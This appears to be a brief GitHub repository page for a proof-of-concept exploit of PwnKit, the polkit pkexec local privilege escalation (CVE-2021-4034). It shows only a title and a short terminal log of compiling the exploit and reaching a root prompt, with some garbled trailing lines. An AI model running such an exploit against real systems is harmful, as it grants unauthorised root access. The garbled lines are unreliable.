/CVE-2021-4034-

PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

Primary LanguageC

CVE-2021-4034-

PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

Release

[user@OxYAss ~]$ gcc blasty-vs-pkexec.c -o makemeroot
[user@OxYAss ~]$ .makemeroot
[root@OxYAss ~]$ whoami
$ ~ ../../..
$ ~
$ ~